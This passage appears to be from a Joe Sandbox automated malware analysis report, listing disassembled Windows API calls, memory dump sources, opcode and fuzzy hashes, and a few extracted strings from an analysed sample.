                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                    • String ID:
                                                                    • API String ID: 2112829910-0
                                                                    • Opcode ID: be0d901f1ec62ee6428e2b7997beeb97a7ab3be7b3c22ab846f869fc2e5c90af
                                                                    • Instruction ID: 5a58f5b29f5bcb7bda11c1fbfd89672ae24b917d06a1ac519db6b63ac700e657
                                                                    • Opcode Fuzzy Hash: be0d901f1ec62ee6428e2b7997beeb97a7ab3be7b3c22ab846f869fc2e5c90af
                                                                    • Instruction Fuzzy Hash: 21D16CB5D142589FCB15CFA8D880AEDBBB5FF48314F28816EE856EB351D730AA41CB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 30311625cb0a887eda6246f020cf48a52202ae4590206e7b9727878026ad73bc
                                                                    • Instruction ID: 07e488a72b493eaf1f6998ab53d31df5d3592bb38e762d1e66de7a4be7e5ef1e
                                                                    • Opcode Fuzzy Hash: 30311625cb0a887eda6246f020cf48a52202ae4590206e7b9727878026ad73bc
                                                                    • Instruction Fuzzy Hash: EC51B171615646AFEB29AF10D881BFAB7E4FF10300F14412EE90657292E7B2ED81DB51
                                                                    APIs
                                                                      • Part of subcall function 000C2151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,000BD7D1,?,00000000,?), ref: 000C21B2
                                                                    • GetLastError.KERNEL32 ref: 000C163C
                                                                    • __dosmaperr.LIBCMT ref: 000C1643
                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 000C167D
                                                                    • __dosmaperr.LIBCMT ref: 000C1684
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1913693674-0
                                                                    • Opcode ID: a682963169b7ede2beab781105329080729a5ed20c5893dc1ce6bdf1be4f9d5b
                                                                    • Instruction ID: 73f4104da19c88a089a599e7aa13533eafddf421a39d16f4a97d5bf43cb8aeec
                                                                    • Opcode Fuzzy Hash: a682963169b7ede2beab781105329080729a5ed20c5893dc1ce6bdf1be4f9d5b
                                                                    • Instruction Fuzzy Hash: 9F217C71604205AFDB20AF659881EFEB7ADEF46364B18852CF82997653DB30ED008B90
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 270feb717a628b7ff486c7995d595feed8aaad3153d3f62910afbcedee78d1b1
                                                                    • Instruction ID: 8559eb54f323461ba77e94ceeb161109ac5e2b5c311b6b0d5cef97f7532f813a
                                                                    • Opcode Fuzzy Hash: 270feb717a628b7ff486c7995d595feed8aaad3153d3f62910afbcedee78d1b1
                                                                    • Instruction Fuzzy Hash: 7C218B71604209AFDB64AF65CC81FEE77ADAF12364750862CF82597163EB34EC008BA0
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 000C2255
                                                                      • Part of subcall function 000C2151: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,000000FF,?,?,00000000,?,?,000BD7D1,?,00000000,?), ref: 000C21B2
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000C228D
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000C22AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 158306478-0
                                                                    • Opcode ID: 0282e0bb348eed0d16473e252d72301a6827065cc338f80d64a1455fd1458d51
                                                                    • Instruction ID: 38ca8aca6460c83d917e0dfc03c226efd2e4381d5f89fbf73bb912e46920cc87
                                                                    • Opcode Fuzzy Hash: 0282e0bb348eed0d16473e252d72301a6827065cc338f80d64a1455fd1458d51
                                                                    • Instruction Fuzzy Hash: F511D2B2501555BFA72127759CCDFBF3A9CDF95395B21042DF902E1502FA24CD0295B1
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,000C4F51,00000000,00000001,00000000,?,?,000C39FA,?,00000000,00000000), ref: 000C57F7
                                                                    • GetLastError.KERNEL32(?,000C4F51,00000000,00000001,00000000,?,?,000C39FA,?,00000000,00000000,?,?,?,000C3340,00000000), ref: 000C5803
                                                                      • Part of subcall function 000C5860: CloseHandle.KERNEL32(FFFFFFFE,000C5813,?,000C4F51,00000000,00000001,00000000,?,?,000C39FA,?,00000000,00000000,?,?), ref: 000C5870
                                                                    • ___initconout.LIBCMT ref: 000C5813
                                                                      • Part of subcall function 000C5835: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,000C57D1,000C4F3E,?,?,000C39FA,?,00000000,00000000,?), ref: 000C5848
                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,000C4F51,00000000,00000001,00000000,?,?,000C39FA,?,00000000,00000000,?), ref: 000C5828
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 09a415617fc4f51d2b0c41102865806f7ee5cd54c406cc2585f76e1b0dc69c37
                                                                    • Instruction ID: 36f735df73b36cdca4c49083de7ceb5a06ab4adad3cc3f378c6df51f00f2308a
                                                                    • Opcode Fuzzy Hash: 09a415617fc4f51d2b0c41102865806f7ee5cd54c406cc2585f76e1b0dc69c37
                                                                    • Instruction Fuzzy Hash: F9F01C3A500558BBDF621F91DC08E9E7F66FF487A1F048015FE0896131CA329864DB91
                                                                    APIs
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 000BDD95
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2026614679.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000002.00000002.2026598764.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026634139.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026648015.00000000000D0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026660121.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2026672376.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ___except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3493665558-3733052814
                                                                    • Opcode ID: 69a41c77cd60767d81d6b6b12fa402a506f1c27ad28741b1ae33a5fc5b01b0de
                                                                    • Instruction ID: ad727a549244f7961dc66a07be5650c369a537eef61ad8a0c26791dba8a49be4
                                                                    • Opcode Fuzzy Hash: 69a41c77cd60767d81d6b6b12fa402a506f1c27ad28741b1ae33a5fc5b01b0de
                                                                    • Instruction Fuzzy Hash: AC31D876800255EBCF266F50CC449EAFBA6FF28315B18455BF8644E111E333DC61DB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000003.1933464874.0000000002C54000.00000004.00000020.00020000.00000000.sdmp, Offset: 02C54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_3_2c54000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: a$crash_count$diagnostics$session_id
                                                                    • API String ID: 0-1225375938
                                                                    • Opcode ID: a9bb30539f13169db19bdb3426e4ae64f0fc9a83ebed8c43bc35236ff8ecb382
                                                                    • Instruction ID: 1557290acee687c5e83e3100be60bed58b47b1e7af25e0999e9a5062f63bbc36
                                                                    • Opcode Fuzzy Hash: a9bb30539f13169db19bdb3426e4ae64f0fc9a83ebed8c43bc35236ff8ecb382
                                                                    • Instruction Fuzzy Hash: C031E46244D3C15EEB138B38896A290BFB1AF13215B2D04CFC5C44F0A7C2A5A56AD72B